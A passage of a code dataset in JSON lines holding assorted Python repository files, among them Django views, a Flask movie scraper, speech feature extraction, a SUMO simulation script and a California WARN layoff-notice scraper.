.order_by(\"-weight\")[:(count * 4)])\n products = []\n for cross_sell in related_product_cross_sells:\n product2 = cross_sell.product2\n if product2.is_visible_to_user(context[\"request\"].user) and product2.is_list_visible():\n products.append(product2)\n if len(products) >= count:\n break\n return products\n\n\n@contextfunction\ndef is_visible(context, product):\n request = context[\"request\"]\n shop_product = product.get_shop_instance(shop=request.shop)\n for error in shop_product.get_visibility_errors(customer=request.customer): # pragma: no branch\n return False\n return True\n\n\n@contextfunction\ndef get_product_cross_sells(context, product, relation_type=\"related\", count=4):\n request = context[\"request\"]\n rtype = ProductCrossSellType.RELATED\n if relation_type == \"computed\":\n rtype = ProductCrossSellType.COMPUTED\n elif relation_type == \"recommended\":\n rtype = ProductCrossSellType.RECOMMENDED\n\n related_product_ids = list((\n ProductCrossSell.objects\n .filter(product1=product, type=rtype)\n .order_by(\"weight\")[:(count * 4)]).values_list(\"product2_id\", flat=True)\n )\n\n related_products = list(\n Product.objects\n .filter(id__in=related_product_ids)\n .list_visible(shop=request.shop, customer=request.customer)\n )\n\n # Order related products by weight. Related product ids is in weight order.\n # If same related product is linked twice to product then lowest weight stands.\n related_products.sort(key=lambda prod: list(related_product_ids).index(prod.id))\n\n return related_products[:count]\n","repo_name":"if413019/ShoopDevelopment","sub_path":"shoop/front/template_helpers/product.py","file_name":"product.py","file_ext":"py","file_size_in_byte":2274,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"42318951700","text":"def dfs(idx, money):\n global cnt\n if money < 0:\n return\n if idx == k:\n if money == 0:\n cnt += 1\n else:\n for i in range(0, d[idx][1] + 1):\n dfs(idx + 1, money - (d[idx][0] * i))\n\n\nt = int(input())\nk = int(input())\nd = []\nfor _ in range(k):\n d.append(tuple(map(int, input().split())))\n\ncnt = 0\ndfs(0, t)\nprint(cnt)","repo_name":"castle-joooun/algorithm_python","sub_path":"inflearn/algorithm/7/7-4.py","file_name":"7-4.py","file_ext":"py","file_size_in_byte":370,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"35632553260","text":"from django.shortcuts import render, get_object_or_404, redirect\nfrom django.views import View\nfrom .models import Course\nfrom .forms import CourseModelForm\n\n\nclass CourseObjectMixin(object):\n model = Course\n lookup = 'id'\n\n def get_object(self):\n id = self.kwargs.get(self.lookup)\n obj = None\n if id is not None:\n obj = get_object_or_404(self.model, id=id)\n return obj\n\n\nclass CourseDeleteView(CourseObjectMixin, View): # Base View class = View\n template_name = 'course_delete.html'\n\n def get(self, request, id=None, *args, **kwargs):\n # GET method\n context = {}\n obj = self.get_object()\n if obj is not None:\n context['object'] = obj\n return render(request, self.template_name, context)\n\n def post(self, request, id=None, *args, **kwargs):\n # POST method\n context = {}\n obj = self.get_object()\n if obj is not None:\n obj.delete()\n context['object'] = None\n return redirect('/courses')\n return render(request, self.template_name, context)\n\n\nclass CourseUpdateView(CourseObjectMixin, View): # Base View class = View\n template_name = 'course_update.html'\n\n def 
get(self, request, id=None, *args, **kwargs):\n # GET method\n context = {}\n obj = self.get_object()\n if obj is not None:\n form = CourseModelForm(instance=obj)\n context['object'] = obj\n context['form'] = form\n return render(request, self.template_name, context)\n\n def post(self, request, id=None, *args, **kwargs):\n # POST method\n context = {}\n obj = self.get_object()\n if obj is not None:\n form = CourseModelForm(request.POST, instance=obj)\n if form.is_valid():\n form.save()\n context['object'] = obj\n context['form'] = form\n return render(request, self.template_name, context)\n\n\nclass CourseCreateView(View): # Base View class = View\n template_name = 'course_create.html'\n\n def get(self, request, *args, **kwargs):\n # GET method\n form = CourseModelForm()\n context = {\"form\": form}\n return render(request, self.template_name, context)\n\n def post(self, request, *args, **kwargs):\n # POST method\n form = CourseModelForm(request.POST)\n if form.is_valid():\n form.save()\n form = CourseModelForm()\n context = {\"form\": form}\n return render(request, self.template_name, context)\n\n\nclass CourseListView(View): # Base View class = View\n template_name = 'course_list.html'\n queryset = Course.objects.all()\n\n def get_queryset(self):\n return self.queryset\n\n def get(self, request, *args, **kwargs):\n context = {'object_list': self.get_queryset()}\n print(context)\n return render(request, self.template_name, context)\n\n\nclass MyListView(CourseListView):\n queryset = Course.objects.filter(id=1)\n\n\nclass CourseView(CourseObjectMixin, View): # Base View class = View\n template_name = 'course_detail.html'\n\n def get(self, request, id=None, *args, **kwargs):\n context = {'object': self.get_object()}\n # if id is not None:\n # obj = get_object_or_404(Course, id=id)\n # context['object'] = obj\n return render(request, self.template_name, context)\n\n\n# # HTTP METHODS\ndef my_fbv(request, *args, **kwargs):\n template = 'about.html'\n return render(request, template, {})\n\n\n\n","repo_name":"kirankotari/tryDjango","sub_path":"src/courses/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3544,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"71828996588","text":"import cv2\nimport os\n\npath = \"D:/Project/MachineLearning/NhanDienLogo/datasets/Logo/\"\ndir = path + \"images/\"\n\nsize = []\n\nfile = os.listdir(dir+\"/\")\nj = 0\nfor i in file:\n print(j, \" - \", len(file))\n img = cv2.imread(dir+i, cv2.IMREAD_UNCHANGED)\n try:\n s = img.shape\n w, h = s[0], s[1]\n if w not in size:\n size.append(w)\n if h not in size:\n size.append(h)\n except:\n pass\n j += 1\n\nprint(max(size), min(size))\n\n","repo_name":"ttsbao/NhanDienLogo","sub_path":"checksize.py","file_name":"checksize.py","file_ext":"py","file_size_in_byte":478,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"10403737216","text":"#!/usr/bin/env python\n#\n# Add\n## Upvote\n## Downvote\n# Remove\n# \n#\nimport webapp2\nimport logging, json\nfrom datetime import datetime\nfrom src import rank, config\nfrom webapp2_extras import jinja2, sessions\nfrom src.entities import post as post1\nfrom src.jinja2_factory import jinja2_factory\nimport random\n\nclass BaseHandler(webapp2.RequestHandler):\n\n @webapp2.cached_property\n def jinja2(self):\n return jinja2.get_jinja2(factory=jinja2_factory)\n \n def render_response(self, filename, **template_args):\n 
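# render the named template with the given context and write the result straight to the HTTP response\n        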
self.response.write(self.jinja2.render_template(filename, **template_args))\n \n def dispatch(self):\n # Get a session store for this request\n self.session_store = sessions.get_store(request = self.request)\n \n try:\n # Dispatch request\n webapp2.RequestHandler.dispatch(self)\n finally:\n # Save all sessions\n self.session_store.save_sessions(self.response)\n \n @webapp2.cached_property\n def session(self):\n # Return a session using the default cookie key\n return self.session_store.get_session()\n \nclass MainHandler(BaseHandler):\n def get(self):\n list = post1.Post().get_by_score()\n \n try:\n status = self.session.get_flashes('status')[0][0]\n flash = self.session.get_flashes('message')[0][0]\n except IndexError: \n status, flash = None, None\n self.render_response('index.html', list=list, status=status, flash=flash)\n \nclass PostHandler(BaseHandler):\n def post(self):\n if(self.session.get('authorized') == 'True'):\n p1 = post1.Post()\n p1.populate(title=self.request.get('title'),\n description = self.request.get('description'),\n upvotes = int(round(random.random() * 100)),\n downvotes = int(round(random.random() * 100)),\n date_posted = datetime.now())\n p1.put()\n self.session.add_flash('alert alert-success', key='status')\n self.session.add_flash('Posted successfully', key='message')\n else:\n self.session.add_flash('alert alert-error', key='status')\n self.session.add_flash('Cannot post. Are you authorized?', key='message')\n \n self.redirect(self.uri_for('index'))\n \nclass VoteHandler(BaseHandler):\n def post(self):\n p = post1.Post()\n key = self.request.get('value')\n votes = 0\n \n if(self.request.get('action') == 'upvote'):\n p = p.upvote(key)\n votes = p.upvotes\n elif(self.request.get('action') == 'downvote'):\n p = p.downvote(key)\n votes = p.downvotes\n \n self.response.write(json.dumps({ 'count' : votes, 'score' : p.score }))\n \nclass LoginHandler(BaseHandler):\n def post(self):\n if(self.request.get('Login') == 'a correct password'):\n self.session['authorized'] = 'True'\n self.session.add_flash('alert alert-success', key='status')\n self.session.add_flash('Authorized to post messages', key='message')\n else:\n self.session.add_flash('alert alert-error', key='status')\n self.session.add_flash('Incorrect authentication', key='message')\n \n self.redirect('/')\n\nclass DeleteHandler(BaseHandler):\n def post(self):\n logging.debug(self.session.get('authorized'))\n if(self.session.get('authorized') == 'True'):\n key = self.request.get('key')\n post1.Post().delete(key)\n self.response.write(json.dumps({}))\n else:\n self.abort(403)\n \n # if(self.request.get('Login') == 'a correct password'):\n # self.session['authorized'] = 'True'\n # self.session.add_flash('alert alert-success', key='status')\n # self.session.add_flash('Authorized to post messages', key='message')\n # else:\n # self.session.add_flash('alert alert-error', key='status')\n # self.session.add_flash('Incorrect authentication', key='message')\n \n \napp = webapp2.WSGIApplication([\n webapp2.Route('/', MainHandler, name='index'),\n ('/post', PostHandler),\n ('/vote', VoteHandler),\n ('/login', LoginHandler),\n ('/delete', DeleteHandler)\n], debug=True, config=config.config)\n","repo_name":"posibyte/wilsonrankgaetest","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4464,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"41677096247","text":"#!/usr/bin/env python\n\n\"\"\"Aggiorna la vista 
materializzata (update the materialized view)\"\"\"\n\n__author__ = \"Roberto Marzocchi\"\n__copyright__ = \"Gter srl\"\n\n\nimport os # standard library\nimport sys\n\nimport requests # 3rd party packages\nimport json\n\nimport psycopg2\nfrom credenziali import *\nconn = psycopg2.connect(\"dbname={} user={} password={} host={}\".format(db, user, pwd, ip))\ncur=conn.cursor()\n\n\n\n# get the path to this python script \nspath=os.path.dirname(os.path.realpath(__file__)) \n# the log subfolder must exist and should preferably be listed in the .gitignore file \n\n# library for log handling\nimport logging\n# add a reference to the date and the schema \n\n\nlogging.basicConfig( \n    format='%(asctime)s\\t%(levelname)s\\t%(message)s',\n    filemode='w', # overwrite or append \n    filename='{}/log/refresh_mv.log'.format(spath), # log file name (comment this out to print to the screen instead)\n    level=logging.DEBUG\n    )\n\n\n\nquery1=u'refresh materialized view terra.mv_statistiche_totali_telecamere_100;'\ntry:\n    cur.execute(query1)\n    conn.commit()\nexcept Exception as e1:\n    logging.error(e1)\n    conn.rollback()\n    \n\n\ncur.close()\nconn.close()\n    \n\n\nlogging.info('Done. refresh materialized view terra.mv_statistiche_totali_telecamere_100')\n","repo_name":"gtergeomatica/loseplus","sub_path":"update_refresh_view.py","file_name":"update_refresh_view.py","file_ext":"py","file_size_in_byte":1241,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"38570283524","text":"import os\r\nimport sys\r\nimport subprocess\r\n\r\nconfig_file_path = ''\r\n\r\ndef sumo_init():\r\n    if 'SUMO_HOME' in os.environ:\r\n        tools = os.path.join(os.environ['SUMO_HOME'], 'tools')\r\n        print(\"SUMO tools path set to \" + tools)\r\n        sys.path.append(tools)\r\n        print('sumo path set done')\r\n    else: \r\n        sys.exit(\"please declare environment variable 'SUMO_HOME'\")\r\n    # sumoProcess = subprocess.Popen([sumoBinary, \"-c\", \"./test.sumocfg\", \"--remote-port\", str(PORT)], stdout=sys.stdout, stderr=sys.stderr)\r\n\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n    args = sys.argv[1:]\r\n    if len(args) != 1:\r\n        print('Usage: python ' + sys.argv[0] + ' cfg_file')\r\n        exit(-1)\r\n    config_file_path = args[0]\r\n    print(\"path: \" + config_file_path)\r\n    sumo_init()\r\n    \r\n    import traci\r\n    import traci.constants as tc\r\n    print(\"traci import done\")\r\n    PORT = 8813\r\n    sumoBinary = 'sumo'\r\n    sumoCmd = [sumoBinary, \"-c\", config_file_path]\r\n    vehID = \"0\"\r\n    traci.start(sumoCmd)\r\n    traci.vehicle.subscribe(vehID, (tc.VAR_ROAD_ID, tc.VAR_LANEPOSITION))\r\n    print(traci.vehicle.getSubscriptionResults(vehID))\r\n    for step in range(3):\r\n        print(\"step\", step)\r\n        traci.simulationStep()\r\n        print(traci.vehicle.getSubscriptionResults(vehID))\r\n    traci.close()\r\n    # traci.vehicle.subscribe(\"0\", (tc.VAR_SPEED, tc.VAR_ACCEL, tc.VAR_ROAD_ID, tc.VAR_LANE_ID, tc.VAR_POSITION))\r\n    # keep stepping the simulation until every vehicle has reached its destination\r\n    # traci.vehicle.moveToXY(vehID=\"0\", edgeID=\"1[1][0]\", lane=1, x=563.869048, y=456, keepRoute=0)\r\n    i = 0\r\n    # while traci.simulation.getMinExpectedNumber() > 0:\r\n    #     traci.simulationStep()\r\n    #     if i < 100:\r\n    #         for veh_id in traci.vehicle.getIDList():\r\n    #             speed = traci.vehicle.getSpeed(veh_id)\r\n    #             [x, y] = traci.vehicle.getPosition(veh_id)\r\n    #             print(veh_id, ':', speed, \":[\", x, \",\", y, \"]\")\r\n\r\n    #     i += 1\r\n    \r\n    # step = 0\r\n    # while step < 1000:\r\n    #     traci.simulationStep()\r\n    #     # print(traci.vehicle.getSubscriptionResults(vehID))\r\n    #     step += 1\r\n    # traci.close()\r\n\r\n\r\n# traci.start([\"sumo\", \"-c\", \"my.sumocfg\"]) 
\r\n# traci.vehicle.subscribe(vehID, (tc.VAR_ROAD_ID, tc.VAR_LANEPOSITION))\r\n# print(traci.vehicle.getSubscriptionResults(vehID))\r\n# for step in range(3):\r\n# print(\"step\", step)\r\n# traci.simulationStep()\r\n# print(traci.vehicle.getSubscriptionResults(vehID))\r\n# traci.close()","repo_name":"Zealoft/Carla_SUMO","sub_path":"SUMOServer/sumo_simulation.py","file_name":"sumo_simulation.py","file_ext":"py","file_size_in_byte":2493,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"37"} +{"seq_id":"22552990471","text":"import networkx as nx\nimport math\nimport random\n\nf=open('test_case_6','r')\nm_prob=float(f.readline())\nk_count=int(f.readline())\n\nnumber_of_nodes=int(f.readline())\n\nnumber_of_edges=int(f.readline())\n\ng=nx.Graph()\n\nfor i in range(number_of_edges):\n\tl=f.readline().split()\n\tg.add_edge(int(l[0]),int(l[1]))\n\tg[int(l[0])][int(l[1])]['weight']=-math.log10(1-float(l[2]))\n\tg[int(l[0])][int(l[1])]['color']=int(l[3])\n\ns=nx.algorithms.simple_paths.all_simple_paths(g,source=1,target=number_of_nodes)\n\ndef path_prob(g,path,target):\n prob=0.0\n k=0\n for index,i in enumerate(path):\n if(i==target):\n break\n prob=prob + g[i][path[index+1]]['weight']\n k=k+g[i][path[index+1]]['color']\n return (prob,k)\n\nflag=0\nfor path in s:\n pp,pk=path_prob(g,path,number_of_nodes)\n if pp<=m_prob and pk <= k_count:\n flag=1\n break\n\n\nprint(m_prob)\nprint(k_count)\nprint(flag)\n\n","repo_name":"parasgoyal12/CS201_DataStructure","sub_path":"Assignment5/a.py","file_name":"a.py","file_ext":"py","file_size_in_byte":908,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"40080374206","text":"from flask import Flask, render_template\r\n\r\nimport requests\r\nfrom bs4 import BeautifulSoup, re\r\n\r\n\r\napp = Flask(__name__)\r\n\r\nMOVEEK_URL = \"https://moveek.com/en/\"\r\nHBO_URL = \"https://www.hbo.com/series\"\r\n\r\ndef get_URL(URL):\r\n \"\"\"Get HTML from(URL)\r\n \"\"\"\r\n r = requests.get(URL)\r\n soup = BeautifulSoup(r.text, 'html.parser')\r\n return soup\r\n\r\n\r\ndef crawl_moveek(URL):\r\n soup = get_URL(URL)\r\n movies = soup.find_all(href=re.compile(\"/phim/\"))\r\n movies_list = list()\r\n\r\n for movie in movies:\r\n _movie = {}\r\n if movie.img:\r\n _movie[\"title\"] = movie[\"title\"]\r\n _movie[\"link\"] = movie[\"href\"]\r\n _movie[\"img\"] = movie.img[\"data-src\"]\r\n movies_list.append(_movie)\r\n return movies_list\r\n\r\n\r\ndef crawl_rating_moveek(URL):\r\n movies_list = crawl_moveek(URL)\r\n for i in range(len(movies_list)):\r\n movie = movies_list[i]\r\n soup = get_URL(\"https://moveek.com\"+movie[\"link\"])\r\n movie[\"gerne\"] = soup.find(class_ = \"mb-0 text-muted text-truncate\").string.strip().strip(\"-\").strip()\r\n try:\r\n movie[\"description\"] = soup.find(class_ = \"mb-3 text-justify\").text\r\n except:\r\n if \"description\" not in movie:\r\n soup=get_URL(\"https://moveek.com/\"+movie[\"link\"].strip(\"/en\"))\r\n movie[\"description\"] = soup.find(class_ = \"mb-3 text-justify\").text\r\n movie[\"rating\"] = soup.find(href = re.compile(\"/review/\")).text.strip()\r\n if movie[\"rating\"] == \"Reviews\" or movie[\"rating\"] == \"Đánh giá\":\r\n movie[\"rating\"] = \"No Review\"\r\n return movies_list\r\n\r\ndef crawl_hbo(URL):\r\n soup = get_URL(URL)\r\n movie_list = []\r\n movies = soup.find_all(class_=\"components/Card--card components/Card--promotional components/Card--withBottomBorder\")\r\n for movie in movies:\r\n _movie = {}\r\n 
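# the CSS class names used below match HBO's generated markup at scrape time and may change\r\n        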
_movie[\"title\"] = movie.find(class_=\"components/CardText--title\").string\r\n _movie[\"link\"] = \"https://www.hbo.com\"+movie[\"href\"]\r\n _movie[\"img\"] = \"https://www.hbo.com\" + movie.find(class_=\"components/CardImage--imageContainer\").img[\"src\"]\r\n try:\r\n _movie[\"description\"] = movie.find(class_=\"components/CardText--details\").p.string\r\n _movie[\"show_time\"] = movie.find(class_=\"components/CardText--contextualLabel\").string\r\n except:\r\n pass\r\n movie_list.append(_movie)\r\n return movie_list\r\n\r\n@app.route('/')\r\ndef home():\r\n return render_template('home.html')\r\n\r\n@app.route('/movies')\r\ndef movies():\r\n data=crawl_rating_moveek(MOVEEK_URL)\r\n return render_template('movies.html', data=data)\r\n\r\n@app.route('/series')\r\ndef series():\r\n data=crawl_hbo(HBO_URL)\r\n return render_template('series.html', data=data)\r\n\r\n\r\nif __name__ == '__main__':\r\n app.run(host='0.0.0.0', port=5000, debug=True)\r\n","repo_name":"huynhdao0808/hbo-web-crawler_fa","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2835,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"19046984446","text":"# DT2118, Lab 1 Feature Extraction\n# Functions to be implemented ----------------------------------\n\nimport scipy.signal as sig\nimport scipy.fftpack as ft\nimport tools\nimport numpy as np \n\ndef enframe(samples, winlen, winshift):\n \"\"\"\n Slices the input samples into overlapping windows.\n\n Args:\n winlen: window length in samples.\n winshift: shift of consecutive windows in samples\n Returns:\n numpy array [N x winlen], where N is the number of windows that fit\n in the input signal\n \"\"\"\n\n prev = 0\n nxt = int(winlen) # 400 samples in one frame (20 ms)\n\n step = int(winshift) # 200 samples per step (10 ms)\n\n num_frames = int(((samples.size - winshift) // winlen) * 2) # 80 frames fit in the signal\n\n result = np.zeros(shape=(num_frames,winlen))\n\n for i in range(0,num_frames):\n result[i] = samples[prev:nxt]\n prev += step\n nxt += step\n\n return result\n\ndef preemp(inp, p=0.97):\n \"\"\"\n Pre-emphasis filter.\n\n Args:\n input: array of speech frames [N x M] where N is the number of frames and\n M the samples per frame\n p: preemhasis factor (defaults to the value specified in the exercise)\n\n Output:\n output: array of pre-emphasised speech samples\n Note (you can use the function lfilter from scipy.signal)\n \"\"\"\n\n np.set_printoptions(suppress=True)\n\n b = np.array([1,-p])\n a = np.array([1])\n\n filtered_signal = sig.lfilter(b, a, inp)\n\n return filtered_signal\n\n\ndef windowing(inp):\n \"\"\"\n Applies hamming window to the input frames.\n\n Args:\n input: array of speech samples [N x M] where N is the number of frames and\n M the samples per frame\n Output:\n array of windowed speech samples [N x M]\n Note (you can use the function hamming from scipy.signal, include the sym=0 option\n if you want to get the same results as in the example)\n \"\"\"\n\n M = 400\n\n winfunc = sig.hamming(M, sym = False)\n\n win = inp * winfunc\n\n return win\n\ndef powerSpectrum(inp, nfft):\n \"\"\"\n Calculates the power spectrum of the input signal, that is the square of the modulus of the FFT\n\n Args:\n input: array of speech samples [N x M] where N is the number of frames and\n M the samples per frame\n nfft: length of the FFT\n Output:\n array of power spectra [N x nfft]\n Note: you can use the function fft from scipy.fftpack\n \"\"\"\n\n spec = ft.fft(inp, 
nfft)\n\n    spec = abs(spec)**2\n\n    return spec\n\ndef logMelSpectrum(inp, samplingrate):\n    \"\"\"\n    Calculates the log output of a Mel filterbank when the input is the power spectrum\n\n    Args:\n        input: array of power spectrum coefficients [N x nfft] where N is the number of frames and\n               nfft the length of each spectrum\n        samplingrate: sampling rate of the original signal (used to calculate the filterbanks)\n    Output:\n        array of Mel filterbank log outputs [N x nmelfilters] where nmelfilters is the number\n        of filters in the filterbank\n    Note: use the trfbank function provided in tools.py to calculate the filterbank shapes and\n          nmelfilters\n    \"\"\"\n\n\n\n    trf = tools.trfbank(samplingrate, 512)\n\n    res = np.dot(inp, trf.T)\n\n    res = np.log10(res)\n\n    return res\n\ndef cepstrum(inp, nceps):\n    \"\"\"\n    Calculates Cepstral coefficients from mel spectrum applying Discrete Cosine Transform\n\n    Args:\n        input: array of log outputs of Mel scale filterbank [N x nmelfilters] where N is the\n               number of frames and nmelfilters the length of the filterbank\n        nceps: number of output cepstral coefficients\n    Output:\n        array of Cepstral coefficients [N x nceps]\n    Note: you can use the function dct from scipy.fftpack.realtransforms\n    \"\"\"\n\n    cosine = ft.dct(inp, norm = 'ortho')\n\n    res = cosine[:,0:nceps]\n\n#    res = tools.lifter(res)\n\n    return res\n\ndef dtw(localdist):\n    \"\"\"Dynamic Time Warping.\n\n    Args:\n        localdist: array NxM of local distances computed between two sequences\n        of length N and M respectively\n\n    Output:\n        globaldist: scalar, global distance computed by Dynamic Time Warping\n    \"\"\"\n\n    test = float(\"inf\")\n\n    LocD_rows, LocD_columns = localdist.shape\n\n    AccD = np.ones(shape = (LocD_rows + 1, LocD_columns + 1))\n\n    for i in range(1, LocD_rows + 1):\n        AccD[i][0] = test\n    for i in range(1, LocD_columns + 1):\n        AccD[0][i] = test\n    AccD[0][0] = 0\n\n\n    for h in range(1, LocD_rows + 1):\n        for k in range(1, LocD_columns + 1):\n            AccD[h][k] = localdist[h-1][k-1] + min(AccD[h-1][k], AccD[h-1][k-1], AccD[h][k-1])\n\n    # the accumulated distance in the bottom-right cell is the scalar global DTW distance\n    globaldist = AccD[LocD_rows][LocD_columns]\n\n    return globaldist\n\n","repo_name":"RikkoE/Speech-recognition-lab-1","sub_path":"proto.py","file_name":"proto.py","file_ext":"py","file_size_in_byte":4758,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"29664277103","text":"import logging\nimport os\nimport re\nfrom pathlib import Path\nfrom urllib.parse import urlparse\n\nimport pdfplumber\nfrom bs4 import BeautifulSoup\nfrom openpyxl import load_workbook\n\nfrom .. 
import utils\nfrom ..cache import Cache\n\n__authors__ = [\"zstumgoren\", \"Dilcia19\", \"ydoc5212\", \"stucka\"]\n__tags__ = [\"html\", \"pdf\", \"excel\"]\n__source__ = {\n \"name\": \"California Employment Development Department\",\n \"url\": \"https://edd.ca.gov/en/Jobs_and_Training/Layoff_Services_WARN\",\n}\n\nlogger = logging.getLogger(__name__)\n\n\ndef scrape(\n data_dir: Path = utils.WARN_DATA_DIR,\n cache_dir: Path = utils.WARN_CACHE_DIR,\n) -> Path:\n \"\"\"\n Scrape data from California.\n\n Compiles a single CSV for CA using historical PDFs and an Excel file for the current fiscal year.\n\n Only regenerates the CSV if a PDF or the Excel file have changed.\n\n Keyword arguments:\n data_dir -- the Path were the result will be saved (default WARN_DATA_DIR)\n cache_dir -- the Path where results can be cached (default WARN_CACHE_DIR)\n\n Returns: the Path where the file is written\n \"\"\"\n cache = Cache(cache_dir)\n base_url = \"https://edd.ca.gov/Jobs_and_Training\"\n\n # Get the page with the link list\n logger.debug(\"Scraping list of data files\")\n list_url = f\"{base_url}/Layoff_Services_WARN.htm\"\n list_page = utils.get_url(list_url)\n list_html = list_page.text\n cache.write(\"ca/list.html\", list_html)\n\n # Parse out all the links\n list_soup = BeautifulSoup(list_html, \"html.parser\")\n link_list = []\n for link in list_soup.find_all(\"a\"):\n # Grab the URL\n href_url = link.attrs.get(\"href\", \"\").strip()\n\n # If it's a WARN link ...\n if re.search(r\"warn[-_]?report\", href_url, re.I):\n # Build it up\n if href_url.startswith(\"/\"):\n full_url = f\"https://edd.ca.gov{href_url}\"\n else:\n full_url = href_url\n\n # Add it to the list\n link_list.append(full_url)\n\n # Download all the data files\n file_list = []\n for link in link_list:\n file_name = os.path.basename(urlparse(link).path)\n file_path = cache.download(f\"ca/{file_name}\", link)\n file_list.append(file_path)\n\n # Parse all the data files\n output_rows = []\n for file_ in file_list:\n if str(file_).endswith(\"pdf\"):\n row_list = _extract_pdf_data(file_)\n else:\n row_list = _extract_excel_data(file_)\n output_rows += row_list\n\n # Write it out\n output_headers = [\n \"notice_date\",\n \"effective_date\",\n \"received_date\",\n \"company\",\n \"city\",\n \"num_employees\",\n \"layoff_or_closure\",\n \"county\",\n \"address\",\n \"source_file\",\n ]\n output_path = data_dir / \"ca.csv\"\n utils.write_dict_rows_to_csv(\n output_path, output_headers, output_rows, extrasaction=\"ignore\"\n )\n\n # Return the path\n return output_path\n\n\ndef _extract_excel_data(wb_path):\n \"\"\"Parse data from the provided Excel file.\"\"\"\n logger.debug(f\"Reading in {wb_path}\")\n wb = load_workbook(filename=wb_path)\n targetsheet = \"Detailed WARN Report \"\n if targetsheet in wb.sheetnames:\n ws = wb[targetsheet]\n logger.debug(f\"Using worksheet '{targetsheet}'\")\n else:\n ws = wb.worksheets[0]\n logger.debug(\n f\"Using first worksheet; sheet {targetsheet} not found, but maybe look for them to remove the space\"\n )\n rows = [row for row in ws.rows]\n # Throw away initial rows until we reach first data row\n while True:\n row = rows.pop(0)\n first_cell = row[0].value.strip().lower()\n if first_cell.startswith(\"county\"):\n # Grab the header\n headers = row\n break\n\n # Get the location of the final two fields, which vary from week to week\n num_employees_index = next(\n i for i, c in enumerate(headers) if c.value and \"employees\" in c.value.lower()\n )\n address_index = next(\n i for i, c in 
enumerate(headers) if c.value and \"address\" in c.value.lower()\n )\n\n # Loop through all the rows\n payload = []\n for row in rows:\n first_cell = row[0].value.strip().lower()\n # Exit if we've reached summary row at bottom\n if first_cell == \"report summary\":\n break\n\n data = {\n \"county\": row[0].value.strip(),\n \"notice_date\": _convert_date(row[1].value),\n \"received_date\": _convert_date(row[2].value),\n \"effective_date\": _convert_date(row[3].value),\n \"company\": row[4].value.strip(),\n \"layoff_or_closure\": row[5].value.strip(),\n \"num_employees\": row[num_employees_index].value,\n \"address\": row[address_index].value.strip(),\n \"source_file\": str(wb_path).split(\"/\")[-1],\n }\n payload.append(data)\n return payload\n\n\ndef _convert_date(dt):\n return dt.strftime(\"%m/%d/%Y\")\n\n\ndef _extract_pdf_data(pdf_path):\n headers = [\n \"notice_date\",\n \"effective_date\",\n \"received_date\",\n \"company\",\n \"location\",\n \"city\",\n \"county\",\n \"num_employees\",\n \"layoff_or_closure\",\n \"source_file\",\n ]\n header_crosswalk = {\n \"Address\": \"location\",\n \"City\": \"city\",\n \"Company\": \"company\",\n \"County\": \"county\",\n \"Effective\\nDate\": \"effective_date\",\n \"Effective \\nDate\": \"effective_date\",\n \"Effective \\nDate\": \"effective_date\",\n \"Effective Date\": \"effective_date\",\n \"EffectiveDate\": \"effective_date\",\n \"Employees\": \"num_employees\",\n \"Layoff/Closure\": \"layoff_or_closure\",\n \"Layoff/Closure Type\": \"layoff_or_closure\",\n \"Layoff/Closure\\nType\": \"layoff_or_closure\",\n \"Layoff/Closure \\nType\": \"layoff_or_closure\",\n \"No. Of \\nEmployees\": \"num_employees\",\n \"No. Of Employees\": \"num_employees\",\n \"No. Of\\nEmployees\": \"num_employees\",\n \"Notice\\nDate\": \"notice_date\",\n \"Notice Date\": \"notice_date\",\n \"NoticeDate\": \"notice_date\",\n \"Received\\nDate\": \"received_date\",\n \"Received \\nDate\": \"received_date\",\n \"Received Date\": \"received_date\",\n \"ReceivedDate\": \"received_date\",\n }\n data = []\n logger.debug(f\"Opening {pdf_path} for PDF parsing\")\n with pdfplumber.open(pdf_path) as pdf:\n for idx, page in enumerate(pdf.pages):\n # All pages pages except last should have a single table\n # Last page has an extra summary table, but indexing\n # for the first should avoid grabbing the summary data\n rows = page.extract_tables()[0]\n # Remove header row on first page\n # and update the standardized \"headers\" var if the source\n # data has no county field, as in the case of\n # files covering 07/2016-to-06/2017 fiscal year and earlier\n if idx == 0:\n raw_header = rows.pop(0)\n raw_header_str = \"-\".join([col.strip().lower() for col in raw_header])\n if \"county\" not in raw_header_str:\n headers.remove(\"county\")\n # Skip if it's a summary table (this happens\n # when summary is only table on page, as in 7/2019-6/2020)\n first_cell = rows[0][0].strip().lower()\n if \"summary\" in first_cell:\n continue\n for row in rows:\n data_row = {}\n for i, value in enumerate(row):\n this_raw_header = raw_header[i]\n this_clean_header = header_crosswalk[this_raw_header]\n data_row[this_clean_header] = value\n # Data clean-ups\n data_row.update(\n {\n \"effective_date\": data_row[\"effective_date\"].replace(\" \", \"\"),\n \"received_date\": data_row[\"received_date\"].replace(\" \", \"\"),\n \"source_file\": str(pdf_path).split(\"/\")[-1],\n }\n )\n data.append(data_row)\n return data\n\n\nif __name__ == \"__main__\":\n 
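# allow running this scraper directly for a quick local test\n    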
